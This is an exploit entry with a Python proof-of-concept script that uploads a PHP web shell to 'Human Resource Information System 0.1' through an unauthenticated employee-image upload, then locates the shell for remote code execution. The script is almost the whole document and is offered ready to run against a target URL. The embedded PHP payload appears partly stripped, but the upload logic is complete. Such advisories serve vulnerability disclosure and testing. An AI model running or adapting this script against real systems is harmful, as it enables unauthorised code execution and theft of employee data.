# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html # Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code # Version: 0.1 # Tested on: PHP 7.4.11 , Linux x64_x86 ############################################################################################################ # Description: # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. ############################################################################################################ # Proof of concept: #!/usr/bin/python3 import requests import sys from bs4 import BeautifulSoup def find_shell(domain): req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php") soup = BeautifulSoup(req_2.content , "html.parser") imgs = soup.find_all("img") for i in imgs: src = i['src'] if ("shell.php" in src): print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n") break else: continue def upload_file(domain): print("\n [!] Uploading Shell . . .") payload = """ Shell


{$result}"; ?> """ h = { "Content-Type" : "multipart/form-data" } f = {'employee_image':('shell.php',payload, 'application/x-php', {'Content-Disposition': 'form-data'} ) } d = { "emplo" : "", "employee_companyid" : "test", "employee_firstname" : "test", "employee_lastname" : "test", "employee_middlename" : "test", "branches_datefrom" : "0011-11-11", "branches_recentdate" : "2222-11-11", "employee_position" : "test", "employee_contact" : "23123132132", "employee_sss" : "test", "employee_tin" : "test", "employee_hdmf_pagibig" : "test", "employee_gsis" : "test" } url = domain + "/Admin_Dashboard/process/addemployee_process.php" req = requests.post(url , data=d , files = f) if req.status_code == 200: if ("Insert Successfully" in req.text): print("\n [!] Shell uploaded succefully\n") find_shell(domain) else: print("Exploit Failed 1") def main(): if len(sys.argv) != 2: print('[!] usage: %s ' % sys.argv[0]) print('[!] eg: %s http://vulndomain.com' % sys.argv[0]) sys.exit(-1) print("<><><><><><><><><><><><><><><><><><><><><><><><>") print("<> Human Resource Information System <>") print("<> Shell Uploader <>") print("<><><><><><><><><><><><><><><><><><><><><><><><>") target_domain = sys.argv[1] upload_file(target_domain) if __name__ == "__main__": main()